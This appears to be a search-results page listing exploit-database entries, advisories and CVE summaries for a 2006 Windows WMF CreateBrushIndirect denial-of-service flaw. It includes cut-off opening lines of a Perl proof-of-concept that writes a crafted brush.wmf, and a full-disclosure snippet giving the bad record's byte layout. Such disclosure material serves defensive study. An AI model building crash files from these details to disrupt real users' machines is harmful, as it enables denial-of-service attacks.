8 matches found
MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit
Exploit for unknown platform in category dos / poc ========================================================= MS Windows Explorer WMF CreateBrushIndirect DoS Exploit ========================================================= #!/usr/bin/perl print "\nWMF PoC denial of service exploit by cyanid-E ";...
Microsoft Windows Explorer - .WMF CreateBrushIndirect Denial of Service
Microsoft Windows Explorer - .WMF CreateBrushIndirect Denial of Service #!/usr/bin/perl print "\nWMF PoC denial of service exploit by cyanid-E "; print "\n\ngenerating brush.wmf..."; open(WMF, ">./brush.wmf") or die "cannot create wmf file\n"; print WMF...
Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service
#!/usr/bin/perl print "\nWMF PoC denial of service exploit by cyanid-E "; print "\n\ngenerating brush.wmf..."; open(WMF, ">./brush.wmf") or die "cannot create wmf file\n"; print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64"; print WMF...
Microsoft Windows WMF invalid pointer dereference
Invalid pointer dereference in GDI on CreateBrushIndirect function...
WMF CreateBrushIndirect vulnerability (DoS)
The following WMF exploit appeared on milw0rm today: http://www.milw0rm.com/exploits/3111 The vulnerability is a result of the WMF parser passing a value from the file as a pointer argument to the CreateBrushIndirect function. The function dereferences the pointer and dies with an access violatio...
CVE-2006-4071
Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file...
CVE-2006-4071
Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file...
[Full-disclosure] 0-day XP SP2 wmf exploit (some details)
There are some details for wannabes: 1. 'Bad' wmf record: 07 00 00 00 length of record in words FC 02 type CreateBrushIndirect 08 00 00 00 00 00 00 80 'packed' good old Win16 days LOGBRUSH data: 08 00 - 'packed' lpStyle may be BS_DIBPATTERNPT (6) or BS_DIBPATTERN8X8 (8) 00 00 00 00 - COLORREF any 00 8...